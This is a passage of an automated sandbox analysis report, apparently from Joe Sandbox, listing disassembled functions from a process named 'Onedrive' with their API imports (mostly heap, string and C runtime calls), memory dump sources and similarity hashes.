                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: LocaleName
                                                    • String ID:
                                                    • API String ID: 1723996188-0
                                                    • Opcode ID: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
                                                    • Instruction ID: dd002860621ce85fbbe4470ae01fc83404240d6fcbe5a24ab0b14bb0d05c4577
                                                    • Opcode Fuzzy Hash: 90812c785ae45d4dbd0d637aedc98363c098c1fc638e0205df71d1a71fe8337e
                                                    • Instruction Fuzzy Hash: 0FE1CD3260C781C6E764DB2AE4A462AB7E0F788744F114239E69E9B7ACDB3CD541DF04
                                                    Function 00007FF63EA13E90 Relevance: 9.3, APIs: 6, Instructions: 266memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$ProcessString
                                                    • String ID:
                                                    • API String ID: 457288585-0
                                                    • Opcode ID: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
                                                    • Instruction ID: 6c019e4f07a906157e9e8d646584b95f9dec2a948851503bd68f70467f581641
                                                    • Opcode Fuzzy Hash: b58d795c223e933af8178aaedf77eb8d46f6f4fa86935d1c62db7cd3e1f41b76
                                                    • Instruction Fuzzy Hash: 2F91F461B18B8645ED109FAA99043B9A651AF75FE0F498231EE2D8B7C5DE3CF04D9310
                                                    Function 00007FF63EA14664 Relevance: 9.1, APIs: 6, Instructions: 105memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SysFreeString.OLEAUT32 ref: 00007FF63EA14748
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA14758
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA1476C
                                                    • SysFreeString.OLEAUT32 ref: 00007FF63EA1478C
                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA1479C
                                                    • HeapFree.KERNEL32(?,?,?,00007FF63EA14035,00000000,00000000,?,?,00000000,?,?,00007FF63EA13035), ref: 00007FF63EA147B0
                                                      • Part of subcall function 00007FF63EA12E94: CompareStringEx.KERNEL32 ref: 00007FF63EA12EC4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$String$Process$Compare
                                                    • String ID:
                                                    • API String ID: 3197231773-0
                                                    • Opcode ID: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
                                                    • Instruction ID: 315e4dd8f690d1eca27b123fa79f6d881247f1373f2ceec0c760a32797c40b5d
                                                    • Opcode Fuzzy Hash: 56f79bf90f11542464ed531c6df6cde9723808e7608c5b96574c2fd091f9801c
                                                    • Instruction Fuzzy Hash: 1A417E22A19A4196EE00DF96E4443F9A7A1FBA9BC5F4D8131EA0D8B355DF7CE10CD310
                                                    Function 00007FF63EA1B4F0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70 ref: 00007FF63EA1B531
                                                    • ?Release@Value@DirectUI@@QEAAXXZ.DUI70 ref: 00007FF63EA1B544
                                                      • Part of subcall function 00007FF63EA1AF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1AFB3
                                                      • Part of subcall function 00007FF63EA1AF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1360B), ref: 00007FF63EA1B05A
                                                      • Part of subcall function 00007FF63EA1BB50: StrToID.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB6B
                                                      • Part of subcall function 00007FF63EA1BB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB7E
                                                      • Part of subcall function 00007FF63EA1BB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB96
                                                      • Part of subcall function 00007FF63EA1B6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF63EA1B9D1), ref: 00007FF63EA1B6F6
                                                    • towlower.MSVCRT ref: 00007FF63EA1B5E5
                                                    • towlower.MSVCRT ref: 00007FF63EA1B5F8
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF63EA1B61D
                                                    • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF63EA1B62F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Element@String@$ContentValue@$Edit2@Release@TouchV12@Value@2@@memsettowlower$CaretCreateDescendent@E__@@@FindPosition@Selection@
                                                    • String ID:
                                                    • API String ID: 1728635042-0
                                                    • Opcode ID: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
                                                    • Instruction ID: d34216883ff80384bc1d6fba69d7ca18dbb7d85b8de540951963b9c06d1869fa
                                                    • Opcode Fuzzy Hash: f8185b381dd9cae6fd31baaa39e3e0ceb803fb853cf683b02eb1faf8e9495004
                                                    • Instruction Fuzzy Hash: BA418332B04A52C6EB109BA6D4105BC77F0FBA8B95B854171EE0E97754DF38E449D350
                                                    Function 00007FF63EA1EDA4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 4104442557-0
                                                    • Opcode ID: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
                                                    • Instruction ID: 603aff558ee588387b997dafcb457a9f74899d4f9682218c1284a75a4ad2313b
                                                    • Opcode Fuzzy Hash: f3adc634d01244b8c552e817e92152aec10bd9510da74559573b3576420bdd9d
                                                    • Instruction Fuzzy Hash: 8E113036A05F418AEB00DF72E8542A833A4FB78758F400A35FA6D87B94EF7CD5689350
                                                    Function 00007FFDF3AD7C80 Relevance: 9.0, APIs: 6, Instructions: 39COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Frame$BlockEstablisherHandler3::StateUnwind$ControlFrom$EntryFunctionLookup
                                                    • String ID:
                                                    • API String ID: 523381305-0
                                                    • Opcode ID: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
                                                    • Instruction ID: 228a1ef7e77b71fc2dd04054134023f79ddf4efff3cba774ce4566b455709232
                                                    • Opcode Fuzzy Hash: 1c938a9c421dafcbaaf4c7f9a1c99e9a12375c26f6b421891ec9a4fd2c3daaf4
                                                    • Instruction Fuzzy Hash: FD11BF76A18A8182C720DB56E0504AFBB70FBCAB94F601526EEDC57B6DCF6DD5008F40
                                                    Function 00007FFDF3AF8D00 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 210COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: String__crt$Info
                                                    • String ID: $z
                                                    • API String ID: 2508956065-2251613814
                                                    • Opcode ID: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
                                                    • Instruction ID: d09a8a3ffaf857e2b90de34713e0ab682e3900d888012c3dcb8cb07530b27ccc
                                                    • Opcode Fuzzy Hash: a1bb79b3926ab07b511d83ff6639c85910dc0fd292b6cb2822028fa61ec3b579
                                                    • Instruction Fuzzy Hash: C8B1273260C6C08BD764CB59E0907AEFBA0F7C9754F444526EADA87B99CBACE444CF40
                                                    Function 00007FFDF3B00B9C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • %ls, xrefs: 00007FFDF3B00E4B
                                                    • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 00007FFDF3B00E60
                                                    • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 00007FFDF3B00E3F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __free_lconv_mon__free_lconv_num
                                                    • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                                                    • API String ID: 2148069796-164516335
                                                    • Opcode ID: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
                                                    • Instruction ID: 9efef3c005775bb50eafd6a8c4b4fa5186d35528c68d8ed42d24c8731551a96d
                                                    • Opcode Fuzzy Hash: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
                                                    • Instruction Fuzzy Hash: 0A914F22718A8581EB50CB46E0E577AB360F7D4B80F465136EA9E5BBE9CFBCD485C700
                                                    Function 00007FFDF3AD67D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: MOC$RCC
                                                    • API String ID: 0-2084237596
                                                    • Opcode ID: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
                                                    • Instruction ID: 294647ea33c24de903f8fc4075b389db6f42e37ded52117514431398dfcabd87
                                                    • Opcode Fuzzy Hash: 59c54c8cb16b957d9b1ed07fc171562f92a7a927a343df4c3b5bb3759d843deb
                                                    • Instruction Fuzzy Hash: F891D732A08BC685E7709B16E4607EEB7A0FB88784F415036EA9D57BA9DF3CD544CB00
                                                    Function 00007FF63EA1A9EC Relevance: 8.9, APIs: 7, Instructions: 160memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF63EA1DACF,?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB27
                                                    • HeapAlloc.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB3B
                                                    • memmove.MSVCRT(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB6F
                                                    • GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1AB8E
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1ABA2
                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00007FF63EA1DACF,?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1ABCB
                                                    • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1ABDF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
                                                    • Instruction ID: 330434f8f0a34e2470447d7e2d9bc303e9e5a08da557df013370e7b65dc32969
                                                    • Opcode Fuzzy Hash: dad896d2d793cc911e38404661b56dba7b395c6b74f73abf0410838d05515740
                                                    • Instruction Fuzzy Hash: 7451E8327086468AEA18AFA2A40407976D2FFB8780F498439FA4FD3341DE3DE44DA214
                                                    Function 00007FF63EA1949C Relevance: 8.9, APIs: 7, Instructions: 122memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
                                                    • Instruction ID: 4bec0546c4616c514de89d32a4cd58f0da64aeb0ecf5cdb3dd9770872d2af485
                                                    • Opcode Fuzzy Hash: d52f1c5daf9b55119971937f55c72f90c6fe77c5cc7fbe569b2c6201aa31f2e0
                                                    • Instruction Fuzzy Hash: 31418532B0CB4287EA149F97A440279BAA1BFA4BD1F098034EE5E97754DF3CE44DD210
                                                    Function 00007FFDF3AF9135 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_new[]
                                                    • String ID: minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp
                                                    • API String ID: 3742145013-426720447
                                                    • Opcode ID: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
                                                    • Instruction ID: 0e2d3f542c66707a21fe382088adb3d9a22b6d542f1e12c1758730fe10e64d80
                                                    • Opcode Fuzzy Hash: 60669bbcb90472b39e6566556282e0c1fef63ff969ffe470ccdd1451293b4045
                                                    • Instruction Fuzzy Hash: 1F51312270868186E760DB26E4A4AAE73A0FBC4754F414235E6AD9B7EDDF2CD504CB40
                                                    Function 00007FF63EA1DD74 Relevance: 8.9, APIs: 7, Instructions: 113memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
                                                    • Instruction ID: d5fae9b2795c1171301c66d11436bcf50416ce08c7dd72bb5bb3cf7bfe68296d
                                                    • Opcode Fuzzy Hash: dd59d9a7f5ff281a3a5ac38261a22c1cfc43348459e99cafb0c1c9f369091ba9
                                                    • Instruction Fuzzy Hash: F441A922B09783C7EA149F976540179A691BFB8BC2B098434EE5E97791DF3CF449A220
                                                    Function 00007FF63EA162F0 Relevance: 8.9, APIs: 7, Instructions: 102memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16377
                                                    • HeapAlloc.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA1638B
                                                    • memmove.MSVCRT(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA163BC
                                                    • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA163D2
                                                    • HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA163E6
                                                    • GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16414
                                                    • HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16428
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
                                                    • Instruction ID: 1866bd10066ae9a63f198fc139ad207867221485ae0c9e64a6c0db5b9347c843
                                                    • Opcode Fuzzy Hash: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
                                                    • Instruction Fuzzy Hash: 24319322F08B5687EA059F96A54407DBAA1FFE9BC1B0A8034EE0DC3344DF3CD449A260
                                                    Function 00007FF63EA122BC Relevance: 8.9, APIs: 7, Instructions: 101memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
                                                    • Instruction ID: 307be897010465c79163230f5af2e175f35eb380cce1d5924434fbab43c0be4c
                                                    • Opcode Fuzzy Hash: e712f9ac12633a78c19ab5ec0b286bbeba9ad5bbc8c49b7ef324b6a63908fe2e
                                                    • Instruction Fuzzy Hash: 20318626B0975687EA15AFD76544079BAD1FFF9BC1B0A8034EE0D87345DF3CE44AA220
                                                    Function 00007FF63EA19640 Relevance: 8.9, APIs: 7, Instructions: 101memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA196BF
                                                    • HeapAlloc.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA196D3
                                                    • memmove.MSVCRT(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA19700
                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA19716
                                                    • HeapFree.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA1972A
                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA19758
                                                    • HeapFree.KERNEL32(?,00000000,00000000,00007FF63EA1D591,?,00000000,00000000,00007FF63EA1D1A7,?,?,00000000), ref: 00007FF63EA1976C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
